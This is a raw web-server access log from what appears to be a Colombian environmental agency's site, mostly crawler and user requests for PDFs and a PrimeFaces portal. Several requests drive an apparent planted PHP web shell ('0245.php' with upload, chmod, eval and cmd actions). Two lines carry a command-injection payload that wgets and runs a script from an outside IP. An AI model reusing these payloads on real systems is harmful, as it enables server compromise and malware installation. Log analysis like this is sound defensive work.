47.128.17.119 - - [29/Mar/2024:22:16:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cnuevo%5Cmailoutput HTTP/1.1" 200 2812
47.128.23.144 - - [29/Mar/2024:22:16:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5CMercuryMail&f=wldap32.fff HTTP/1.1" 200 2850
172.22.2.4 - - [29/Mar/2024:22:16:41 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202022.pdf HTTP/1.1" 200 292772
201.245.192.253 - - [29/Mar/2024:22:16:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
47.128.33.91 - - [29/Mar/2024:22:16:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=comment.php HTTP/1.1" 200 2886
47.128.115.201 - - [29/Mar/2024:22:17:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=tbl_tracking.php HTTP/1.1" 200 2852
66.249.66.19 - - [29/Mar/2024:22:17:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7105.pdf HTTP/1.1" 200 130000
47.128.24.47 - - [29/Mar/2024:22:17:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=eval&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+1999%5C HTTP/1.1" 200 2778
66.249.66.19 - - [29/Mar/2024:22:17:49 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202024/00521.pdf HTTP/1.1" 304 -
47.128.123.145 - - [29/Mar/2024:22:18:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat&f=LICENSE HTTP/1.1" 200 2959
47.128.123.145 - - [29/Mar/2024:22:18:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_license HTTP/1.1" 200 1034
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.123.145 - - [29/Mar/2024:22:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
172.22.2.4 - - [29/Mar/2024:22:16:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.217.245 - - [29/Mar/2024:22:18:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12899
47.128.39.124 - - [29/Mar/2024:22:18:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=E%3A%5Cnuevo%5Ctmp%5Chsperfdata_Administrator HTTP/1.1" 200 2772
47.128.57.103 - - [29/Mar/2024:22:18:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=cmd&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental%5C HTTP/1.1" 200 2733
172.22.2.4 - - [29/Mar/2024:22:17:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [29/Mar/2024:22:19:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39982
201.245.192.253 - - [29/Mar/2024:22:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39521
186.29.217.245 - - [29/Mar/2024:22:19:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12896
201.245.192.253 - - [29/Mar/2024:22:19:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39663
216.245.221.92 - - [29/Mar/2024:22:20:02 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.26 - - [29/Mar/2024:22:20:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1540.pdf HTTP/1.1" 200 457842
201.245.192.253 - - [29/Mar/2024:22:20:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39521
186.29.217.245 - - [29/Mar/2024:22:20:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12932
172.22.2.4 - - [29/Mar/2024:22:20:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
186.29.217.245 - - [29/Mar/2024:22:21:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 132800
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.217.245 - - [29/Mar/2024:22:21:34 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [29/Mar/2024:22:21:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
186.29.217.245 - - [29/Mar/2024:22:21:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 48987
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.217.245 - - [29/Mar/2024:22:21:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [29/Mar/2024:22:23:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=913&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1102
181.61.78.137 - - [29/Mar/2024:22:23:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0913.pdf HTTP/1.1" 206 1
181.61.78.137 - - [29/Mar/2024:22:23:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0913.pdf HTTP/1.1" 206 637450
181.61.78.137 - - [29/Mar/2024:22:23:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0913.pdf HTTP/1.1" 200 645938
172.22.2.4 - - [29/Mar/2024:22:22:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2024:22:25:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2024:22:23:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
66.249.66.19 - - [29/Mar/2024:22:26:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2091.pdf HTTP/1.1" 200 529441
52.167.144.179 - - [29/Mar/2024:22:26:14 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
52.167.144.21 - - [29/Mar/2024:22:26:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1812.pdf HTTP/1.1" 200 505787
201.245.192.253 - - [29/Mar/2024:22:26:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
54.39.107.63 - - [29/Mar/2024:22:27:20 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
66.249.66.19 - - [29/Mar/2024:22:27:25 -0500] "GET /BLA/resoluciones/AUTOS%202014/0441.pdf HTTP/1.1" 200 357658
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 200 42157
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:27:38 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
66.249.66.20 - - [29/Mar/2024:22:27:38 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202022/7583.pdf HTTP/1.1" 200 457311
186.29.217.245 - - [29/Mar/2024:22:27:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12924
66.249.66.19 - - [29/Mar/2024:22:27:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4308.pdf HTTP/1.1" 200 165747
186.29.217.245 - - [29/Mar/2024:22:28:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12885
201.245.192.253 - - [29/Mar/2024:22:29:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39982
201.245.192.253 - - [29/Mar/2024:22:29:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39521
146.19.24.28 - - [29/Mar/2024:22:29:23 -0500] "GET / HTTP/1.1" 200 319
66.249.66.19 - - [29/Mar/2024:22:29:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6513.pdf HTTP/1.1" 200 429411
201.245.192.253 - - [29/Mar/2024:22:29:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39663
216.245.221.92 - - [29/Mar/2024:22:30:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2024:22:28:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.217.245 - - [29/Mar/2024:22:30:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12838
201.245.192.253 - - [29/Mar/2024:22:30:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39521
172.22.2.4 - - [29/Mar/2024:22:29:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
181.53.12.229 - - [29/Mar/2024:22:31:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
181.53.12.229 - - [29/Mar/2024:22:31:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
181.53.12.229 - - [29/Mar/2024:22:31:22 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.53.12.229 - - [29/Mar/2024:22:31:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:23 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
181.53.12.229 - - [29/Mar/2024:22:31:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:24 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:31:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12899
181.53.12.229 - - [29/Mar/2024:22:31:37 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16175
181.53.12.229 - - [29/Mar/2024:22:31:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:38 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.229 - - [29/Mar/2024:22:31:38 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:40 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
201.245.192.253 - - [29/Mar/2024:22:31:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
181.53.12.229 - - [29/Mar/2024:22:31:41 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63978
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.229 - - [29/Mar/2024:22:31:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
66.249.66.21 - - [29/Mar/2024:22:31:43 -0500] "GET /Publicaciones/2024EE63634.pdf HTTP/1.1" 200 455873
181.53.12.229 - - [29/Mar/2024:22:31:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 4735
186.29.217.245 - - [29/Mar/2024:22:32:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12900
181.53.12.229 - - [29/Mar/2024:22:32:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32164
172.22.2.4 - - [29/Mar/2024:22:32:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [29/Mar/2024:22:32:54 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Mar/2024:22:32:55 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
186.29.217.245 - - [29/Mar/2024:22:33:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12880
172.22.2.4 - - [29/Mar/2024:22:32:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62310
51.15.164.30 - - [29/Mar/2024:22:34:58 -0500] "HEAD /semana-santa-no-extraer-animales-silvestres-ni-consumir-sus-productos.html HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2024:22:35:02 -0500] "HEAD / HTTP/1.1" 200 -
186.29.217.245 - - [29/Mar/2024:22:35:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12855
89.40.124.224 - - [29/Mar/2024:22:35:33 -0500] "GET /semana-santa-no-extraer-animales-silvestres-ni-consumir-sus-productos.html HTTP/1.1" 200 916
89.40.112.188 - - [29/Mar/2024:22:35:34 -0500] "GET /semana-santa-no-extraer-animales-silvestres-ni-consumir-sus-productos.html HTTP/1.1" 200 916
172.22.2.4 - - [29/Mar/2024:22:34:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.217.245 - - [29/Mar/2024:22:35:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12874
69.171.249.8 - - [29/Mar/2024:22:36:19 -0500] "GET /images/Senderos%20cerrados.jpeg HTTP/1.1" 200 123153
172.22.2.4 - - [29/Mar/2024:22:36:38 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [29/Mar/2024:22:36:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
52.167.144.235 - - [29/Mar/2024:22:36:39 -0500] "GET /reciclaton-universidad-de-la-salle-se-une-a-esta-iniciativa.html HTTP/1.1" 200 753
172.22.2.4 - - [29/Mar/2024:22:35:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
52.167.144.21 - - [29/Mar/2024:22:36:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0059.pdf HTTP/1.1" 200 479033
40.77.167.60 - - [29/Mar/2024:22:37:17 -0500] "GET /Publicaciones/2024EE54610.pdf HTTP/1.1" 404 227
172.22.2.4 - - [29/Mar/2024:22:37:28 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [29/Mar/2024:22:37:28 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
52.167.144.222 - - [29/Mar/2024:22:37:56 -0500] "GET /Publicaciones/2024EE57858.pdf HTTP/1.1" 404 227
186.29.217.245 - - [29/Mar/2024:22:37:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 136295
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.217.245 - - [29/Mar/2024:22:38:00 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
186.29.217.245 - - [29/Mar/2024:22:38:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40290
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.217.245 - - [29/Mar/2024:22:38:09 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
66.249.66.19 - - [29/Mar/2024:22:38:39 -0500] "GET /portel_dama/libreria/pdf/ecosistemas/restauracion/sitio/22_proye/xtras_in/4.pdf HTTP/1.1" 404 1018
